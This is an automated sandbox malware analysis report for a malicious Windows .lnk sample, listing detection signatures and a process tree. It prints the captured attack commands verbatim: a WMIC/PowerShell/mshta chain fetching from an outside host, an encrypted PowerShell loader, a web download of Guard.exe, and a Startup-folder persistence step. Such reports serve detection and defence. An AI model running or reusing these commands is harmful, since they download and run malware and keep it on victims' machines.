Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
n5Szx8qsFB.lnk

Overview

General Information

Sample name:n5Szx8qsFB.lnk
renamed because original name is a hash value
Original sample name:a1cfce4d0ce44d183b7c9c5bbce9d8f5.lnk
Analysis ID:1581249
MD5:a1cfce4d0ce44d183b7c9c5bbce9d8f5
SHA1:f5f7d71c40e07bb97f55754f920879f05747754e
SHA256:be673f7be053fa7deb72a5e592c48c2acfc2f6f31c5c5aeaaf03602419aa00e9
Tags:lnkuser-abuse_ch
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Suricata IDS alerts for network traffic
Windows shortcut file (LNK) starts blacklisted processes
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Bypasses PowerShell execution policy
Contains functionality to create processes via WMI
Creates processes via WMI
Drops PE files to the user root directory
Drops PE files with a suspicious file extension
Powershell drops PE file
Sigma detected: Execution from Suspicious Folder
Sigma detected: Execution of Powershell Script in Public Folder
Sigma detected: Parent in Public Folder Suspicious Process
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Invoke-WebRequest Execution
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious Process Created Via Wmic.EXE
Sigma detected: WScript or CScript Dropper
Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Windows shortcut file (LNK) contains suspicious command line arguments
AV process strings found (often used to terminate AV products)
Binary contains a suspicious time stamp
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: PowerShell Web Download
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

Process Tree

  • System is w10x64
  • WMIC.exe (PID: 7716 cmdline: "C:\Windows\System32\Wbem\wmic.exe" process call create "powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://tiffany-careers.com/ghep2412_2')" MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
    • conhost.exe (PID: 7724 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7832 cmdline: powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://tiffany-careers.com/ghep2412_2') MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7840 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 8004 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta.exe https://tiffany-careers.com/ghep2412_2" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • mshta.exe (PID: 8084 cmdline: "C:\Windows\system32\mshta.exe" https://tiffany-careers.com/ghep2412_2 MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
          • powershell.exe (PID: 7508 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $ddg = '14C80253B9AE5AEAA5DE24659F01D509CF460EE458FB49BF1D72DCB2E4749D746CD9DB27687A100C104C20E190D5CF617E269315FBABFADF12B96DC56A539AF812E893ACB6CACEE8771B90DE79966EA8AF49671C6138083807E7ACDC68E3EC61353DA1434E399CB7632B9BE90E97EAB29FCB7B35D422611B152F95CF04BE80F6B6A45FAFDC6497291682B5C7802B6FCA42509A896D18EA54CB45505CFD7A1C8C74E685914F86C731E1558FF417EC92A2DC9D23F19EB3FCF043A58389E6E7429A89F779599FAFF7153337ADEF7092F87CFD41560B4925E53F92549F33E8B6DC1B08F41B72E964F2ADE2038B32A7DDA6BB4275B72C7CB61D2D3262561B559438D772E33F25EA16A4F4A5B37E3A1E2D30FAA7136E1F92B62F8D942D07912ED348FF9FAF50222803F5EDC5A7672C4130832A45ACB7D486ACF004A4FD70C7A759323981C20A626A900DA5D54CA9800F53C7C7F583F68FFAF098F3B5D3E55A04183E536B28D4AB10FA71047408FD900EC8BC319B08354FE06CAF885C495BED4038E9B3A38F15966CD61A13D4B4829EDC2B5CF872096790A6EEE474238D344D3E50A48B24E4147A525127583AEFFDAB1B1445A14B25869F58430AFE067B1717ACB8EE6FC03DB8BFC4E85494A735B2E5D5529B7F210A86B8968AA5A635BA3167A33F53D93117B8DABA13FEAEC806D04696D012179652DA2D00ED0DB378B1ADB5CCB6887EECFB415501C8B4AB4951E2E3C3A7B58210300BA633883134A2133BCFFB77A40A2CF71261E5C96AF138F818430C5F1950F662436CD9AB039C3010D102AE11667EE05A1FDE3F9D09DF9360A597BC3C17258CC4D59068E1608C9CD7EB29317D774A9ACD572A82D448993812D247A035CF0A3BE7E66E208C657B495D80C5C8FD08AFAEDC1DADB422C48F0CF4A018846F9095299885F66C8E77A16BD3E2D37370BF39F9612227FB24AED54EBC2A16B61240CF5F60839C1E68488B7168C818D4C7C06BD77114FD81636E45EEB0BE6C7D88F9A3100B861CFA70C3F20C85841CB6A80D7FF297E85CBB5621B570F71F29D5040E8D4065899B69E3B0487DD296D8050D2B13F86636C3E0DA27F5B9B38C6EBC9099B3240A5CF588B5516E4730275575A0CF69FFC20A1D3A74FBDAFF1A89C281470E9679791BB282902F01BE778EA837392E23BB96C69B92CAB14848DA247807327413F8E070DEB759C8C6DB84B6F1261895C9DF9E65A07AAD48D9CD1112B002F7E2FD2DB430C92A840AD1C8DD0E9F928700F8441FD7ECB8F92AA178D7809945E9E75ED50BD667AB11BFBBE97A68416CEDF4B67B3282C1E3CCDED973182C3D93E0496E2078AC02F08663A5197CBA0AC63D871B3C79ED71FAB6A005D12988DC3DB05908BBA6B8228970FBB9CF0DFB509FD035E017339D4B70C11381B124CECE98E86BEAD02376FF7BB51EB69151C7FFB32FF35D6D51786E6954554352414D6A5562644B';function vyG ($mgZiHqt){return -split ($mgZiHqt -replace '..', '0x$& ')};$WAvg = vyG($ddg.SubString(0, 2048));$SKz = [System.Security.Cryptography.Aes]::Create();$SKz.Key = vyG($ddg.SubString(2048));$SKz.IV = New-Object byte[] 16;$mZouvbL = $SKz.CreateDecryptor();$KbnMJip = [System.String]::new($mZouvbL.TransformFinalBlock($WAvg, 0,$WAvg.Length)); sal fd $KbnMJip.Substring(3,3); fd $KbnMJip.Substring(6) MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 7496 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • Acrobat.exe (PID: 4520 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Roaming\Project_Information.pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)
              • AcroCEF.exe (PID: 5272 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
                • AcroCEF.exe (PID: 4832 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2100 --field-trial-handle=1584,i,8641109857703384737,8271461273470373674,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
            • XKIZdXAs.exe (PID: 7624 cmdline: "C:\Users\user\AppData\Roaming\XKIZdXAs.exe" MD5: 2A89603D2620B2A62113513709E38E95)
              • powershell.exe (PID: 4268 cmdline: powershell -Command "Invoke-WebRequest -Uri "https://tiffany-careers.com/ALGglt" -OutFile "C:\Users\Public\Guard.exe"" MD5: 04029E121A0CFA5991749937DD22A1D9)
                • conhost.exe (PID: 8012 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • powershell.exe (PID: 8376 cmdline: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
                • conhost.exe (PID: 8384 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                • Guard.exe (PID: 8628 cmdline: "C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3 MD5: 18CE19B57F43CE0A5AF149C96AECC685)
                  • cmd.exe (PID: 8644 cmdline: cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & echo URL="C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
                    • conhost.exe (PID: 8652 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • svchost.exe (PID: 7256 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • wscript.exe (PID: 8736 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • SwiftWrite.pif (PID: 8788 cmdline: "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif" "C:\Users\user\AppData\Local\WordGenius Technologies\G" MD5: 18CE19B57F43CE0A5AF149C96AECC685)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\ghep2412_2[1]emmenhtal_strings_hta_exeEmmenhtal Loader stringSekoia.io
  • 0x3c1cb:$char: = String.fromCharCode(Kk,dU,
  • 0x3c1c4:$var: var
  • 0x57c52:$eval: eval(
  • 0x3c04f:$script1: <script>
  • 0x57c48:$script1: <script>
  • 0x43c3f:$script2: </script>MZ
  • 0x57c6e:$script2: </script>MZ

Sigma Signatures

System Summary

barindex
Sigma detected: Execution from Suspicious Folder
Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3 , CommandLine: "C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3 , CommandLine|base64offset|contains: , Image: C:\Users\Public\Guard.exe, NewProcessName: C:\Users\Public\Guard.exe, OriginalFileName: C:\Users\Public\Guard.exe, ParentCommandLine: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 8376, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3 , ProcessId: 8628, ProcessName: Guard.exe
Sigma detected: Execution of Powershell Script in Public Folder
Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1", CommandLine: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\XKIZdXAs.exe" , ParentImage: C:\Users\user\AppData\Roaming\XKIZdXAs.exe, ParentProcessId: 7624, ParentProcessName: XKIZdXAs.exe, ProcessCommandLine: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1", ProcessId: 8376, ProcessName: powershell.exe
Sigma detected: Parent in Public Folder Suspicious Process
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & echo URL="C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & exit, CommandLine: cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & echo URL="C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & exit, CommandLine|base64offset|contains: rg, Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3 , ParentImage: C:\Users\Public\Guard.exe, ParentProcessId: 8628, ParentProcessName: Guard.exe, ProcessCommandLine: cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & echo URL="C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & exit, ProcessId: 8644, ProcessName: cmd.exe
Sigma detected: Potentially Suspicious PowerShell Child Processes
Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\system32\mshta.exe" https://tiffany-careers.com/ghep2412_2, CommandLine: "C:\Windows\system32\mshta.exe" https://tiffany-careers.com/ghep2412_2, CommandLine|base64offset|contains: , Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta.exe https://tiffany-careers.com/ghep2412_2", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 8004, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\mshta.exe" https://tiffany-careers.com/ghep2412_2, ProcessId: 8084, ProcessName: mshta.exe
Sigma detected: Script Interpreter Execution From Suspicious Folder
Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1", CommandLine: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\XKIZdXAs.exe" , ParentImage: C:\Users\user\AppData\Roaming\XKIZdXAs.exe, ParentProcessId: 7624, ParentProcessName: XKIZdXAs.exe, ProcessCommandLine: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1", ProcessId: 8376, ProcessName: powershell.exe
Sigma detected: Suspicious Invoke-WebRequest Execution
Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: powershell -Command "Invoke-WebRequest -Uri "https://tiffany-careers.com/ALGglt" -OutFile "C:\Users\Public\Guard.exe"", CommandLine: powershell -Command "Invoke-WebRequest -Uri "https://tiffany-careers.com/ALGglt" -OutFile "C:\Users\Public\Guard.exe"", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\XKIZdXAs.exe" , ParentImage: C:\Users\user\AppData\Roaming\XKIZdXAs.exe, ParentProcessId: 7624, ParentProcessName: XKIZdXAs.exe, ProcessCommandLine: powershell -Command "Invoke-WebRequest -Uri "https://tiffany-careers.com/ALGglt" -OutFile "C:\Users\Public\Guard.exe"", ProcessId: 4268, ProcessName: powershell.exe
Sigma detected: Suspicious MSHTA Child Process
Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $ddg = '14C80253B9AE5AEAA5DE24659F01D509CF460EE458FB49BF1D72DCB2E4749D746CD9DB27687A100C104C20E190D5CF617E269315FBABFADF12B96DC56A539AF812E893ACB6CACEE8771B90DE79966EA8AF49671C6138083807E7ACDC68E3EC61353DA1434E399CB7632B9BE90E97EAB29FCB7B35D422611B152F95CF04BE80F6B6A45FAFDC6497291682B5C7802B6FCA42509A896D18EA54CB45505CFD7A1C8C74E685914F86C731E1558FF417EC92A2DC9D23F19EB3FCF043A58389E6E7429A89F779599FAFF7153337ADEF7092F87CFD41560B4925E53F92549F33E8B6DC1B08F41B72E964F2ADE2038B32A7DDA6BB4275B72C7CB61D2D3262561B559438D772E33F25EA16A4F4A5B37E3A1E2D30FAA7136E1F92B62F8D942D07912ED348FF9FAF50222803F5EDC5A7672C4130832A45ACB7D486ACF004A4FD70C7A759323981C20A626A900DA5D54CA9800F53C7C7F583F68FFAF098F3B5D3E55A04183E536B28D4AB10FA71047408FD900EC8BC319B08354FE06CAF885C495BED4038E9B3A38F15966CD61A13D4B4829EDC2B5CF872096790A6EEE474238D344D3E50A48B24E4147A525127583AEFFDAB1B1445A14B25869F58430AFE067B1717ACB8EE6FC03DB8BFC4E85494A735B2E5D5529B7F210A86B8968AA5A635BA3167A33F53D93117B8DABA13FEAEC806D04696D012179652DA2D00ED0DB378B1ADB5CCB6887EECFB415501C8B4AB4951E2E3C3A7B58210300BA633883134A2133BCFFB77A40A2CF71261E5C96AF138F818430C5F1950F662436CD9AB039C3010D102AE11667EE05A1FDE3F9D09DF9360A597BC3C17258CC4D59068E1608C9CD7EB29317D774A9ACD572A82D448993812D247A035CF0A3BE7E66E208C657B495D80C5C8FD08AFAEDC1DADB422C48F0CF4A018846F9095299885F66C8E77A16BD3E2D37370BF39F9612227FB24AED54EBC2A16B61240CF5F60839C1E68488B7168C818D4C7C06BD77114FD81636E45EEB0BE6C7D88F9A3100B861CFA70C3F20C85841CB6A80D7FF297E85CBB5621B570F71F29D5040E8D4065899B69E3B0487DD296D8050D2B13F86636C3E0DA27F5B9B38C6EBC9099B3240A5CF588B5516E4730275575A0CF69FFC20A1D3A74FBDAFF1A89C281470E9679791BB282902F01BE778EA837392E23BB96C69B92CAB14848DA247807327413F8E070DEB759C8C6DB84B6F1261895C9DF9E65A07AAD48D9CD1112B002F7E2FD2DB430C92A840AD1C8DD0E9F928700F8441FD7ECB8F92AA178D7809945E9E75ED50BD667AB11BFBBE97A68416CEDF4B67B3282C1E3CCDED973182C3D93E0496E2078AC02F08663A5197CBA0AC63D871B3C79ED71FAB6A005D12988DC3DB05908BBA6B8228970FBB9CF0DFB509FD035E017339D4B70C11381B124CECE98E86BEAD02376FF7BB51EB69151C7FFB32FF35D6D51786E6954554352414D6A5562644B';function vyG ($mgZiHqt){return -split ($mgZiHqt -replace '..', '0x$& ')};$WAvg = vyG($ddg.SubString(0, 2048));$SKz = [System.Security.Cryptography.Aes]::Create();$SKz.Key = vyG($ddg.SubString(2048));$SKz.IV = New-Object byte[] 16;$mZouvbL = $SKz.CreateDecryptor();$KbnMJip = [System.String]::new($mZouvbL.TransformFinalBlock($WAvg, 0,$WAvg.Length)); sal fd $KbnMJip.Substring(3,3); fd $KbnMJip.Substring(6), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $ddg = '14C80253B9AE5AEAA5DE24659F01D509CF460EE458FB49BF1D72DCB2E4749D746CD9DB27687A100C104C20E190D5CF617E269315FBABFADF12B96DC56A539AF812E893ACB6CACEE8771B90DE79966EA8AF49671C6138083807E7ACDC68E3EC61353DA1434E399CB7632B9BE90E97EAB29FCB7B35D422611B152F95CF04BE80F6B6A45FAFDC6497291682B5C7802B6FCA4250
Sigma detected: Suspicious Process Created Via Wmic.EXE
Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\Wbem\wmic.exe" process call create "powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://tiffany-careers.com/ghep2412_2')", CommandLine: "C:\Windows\System32\Wbem\wmic.exe" process call create "powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://tiffany-careers.com/ghep2412_2')", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\wbem\WMIC.exe, NewProcessName: C:\Windows\System32\wbem\WMIC.exe, OriginalFileName: C:\Windows\System32\wbem\WMIC.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: "C:\Windows\System32\Wbem\wmic.exe" process call create "powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://tiffany-careers.com/ghep2412_2')", ProcessId: 7716, ProcessName: WMIC.exe
Sigma detected: WScript or CScript Dropper
Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" , ProcessId: 8736, ProcessName: wscript.exe
Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
Source: File createdAuthor: Florian Roth (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 4268, TargetFilename: C:\Users\Public\Guard.exe
Sigma detected: Change PowerShell Policies to an Insecure Level
Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $ddg = '14C80253B9AE5AEAA5DE24659F01D509CF460EE458FB49BF1D72DCB2E4749D746CD9DB27687A100C104C20E190D5CF617E269315FBABFADF12B96DC56A539AF812E893ACB6CACEE8771B90DE79966EA8AF49671C6138083807E7ACDC68E3EC61353DA1434E399CB7632B9BE90E97EAB29FCB7B35D422611B152F95CF04BE80F6B6A45FAFDC6497291682B5C7802B6FCA42509A896D18EA54CB45505CFD7A1C8C74E685914F86C731E1558FF417EC92A2DC9D23F19EB3FCF043A58389E6E7429A89F779599FAFF7153337ADEF7092F87CFD41560B4925E53F92549F33E8B6DC1B08F41B72E964F2ADE2038B32A7DDA6BB4275B72C7CB61D2D3262561B559438D772E33F25EA16A4F4A5B37E3A1E2D30FAA7136E1F92B62F8D942D07912ED348FF9FAF50222803F5EDC5A7672C4130832A45ACB7D486ACF004A4FD70C7A759323981C20A626A900DA5D54CA9800F53C7C7F583F68FFAF098F3B5D3E55A04183E536B28D4AB10FA71047408FD900EC8BC319B08354FE06CAF885C495BED4038E9B3A38F15966CD61A13D4B4829EDC2B5CF872096790A6EEE474238D344D3E50A48B24E4147A525127583AEFFDAB1B1445A14B25869F58430AFE067B1717ACB8EE6FC03DB8BFC4E85494A735B2E5D5529B7F210A86B8968AA5A635BA3167A33F53D93117B8DABA13FEAEC806D04696D012179652DA2D00ED0DB378B1ADB5CCB6887EECFB415501C8B4AB4951E2E3C3A7B58210300BA633883134A2133BCFFB77A40A2CF71261E5C96AF138F818430C5F1950F662436CD9AB039C3010D102AE11667EE05A1FDE3F9D09DF9360A597BC3C17258CC4D59068E1608C9CD7EB29317D774A9ACD572A82D448993812D247A035CF0A3BE7E66E208C657B495D80C5C8FD08AFAEDC1DADB422C48F0CF4A018846F9095299885F66C8E77A16BD3E2D37370BF39F9612227FB24AED54EBC2A16B61240CF5F60839C1E68488B7168C818D4C7C06BD77114FD81636E45EEB0BE6C7D88F9A3100B861CFA70C3F20C85841CB6A80D7FF297E85CBB5621B570F71F29D5040E8D4065899B69E3B0487DD296D8050D2B13F86636C3E0DA27F5B9B38C6EBC9099B3240A5CF588B5516E4730275575A0CF69FFC20A1D3A74FBDAFF1A89C281470E9679791BB282902F01BE778EA837392E23BB96C69B92CAB14848DA247807327413F8E070DEB759C8C6DB84B6F1261895C9DF9E65A07AAD48D9CD1112B002F7E2FD2DB430C92A840AD1C8DD0E9F928700F8441FD7ECB8F92AA178D7809945E9E75ED50BD667AB11BFBBE97A68416CEDF4B67B3282C1E3CCDED973182C3D93E0496E2078AC02F08663A5197CBA0AC63D871B3C79ED71FAB6A005D12988DC3DB05908BBA6B8228970FBB9CF0DFB509FD035E017339D4B70C11381B124CECE98E86BEAD02376FF7BB51EB69151C7FFB32FF35D6D51786E6954554352414D6A5562644B';function vyG ($mgZiHqt){return -split ($mgZiHqt -replace '..', '0x$& ')};$WAvg = vyG($ddg.SubString(0, 2048));$SKz = [System.Security.Cryptography.Aes]::Create();$SKz.Key = vyG($ddg.SubString(2048));$SKz.IV = New-Object byte[] 16;$mZouvbL = $SKz.CreateDecryptor();$KbnMJip = [System.String]::new($mZouvbL.TransformFinalBlock($WAvg, 0,$WAvg.Length)); sal fd $KbnMJip.Substring(3,3); fd $KbnMJip.Substring(6), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $ddg = '14C80253B9AE5AEAA5DE24659F01D509CF460EE458FB49BF1D72DCB2E4749D746CD9DB27687A100C104C20E190D5CF617E269315FBABFADF12B96DC56A539AF812E893ACB6CACEE8771B90DE79966EA8AF49671C6138083807E7ACDC68E3EC61353DA1434E399CB7632B9BE90E97EAB29FCB7B35D422611B152F95CF04BE80F6B6A45FAFDC6497291682B5C7802B6FCA4250
Sigma detected: Execution of Suspicious File Type Extension
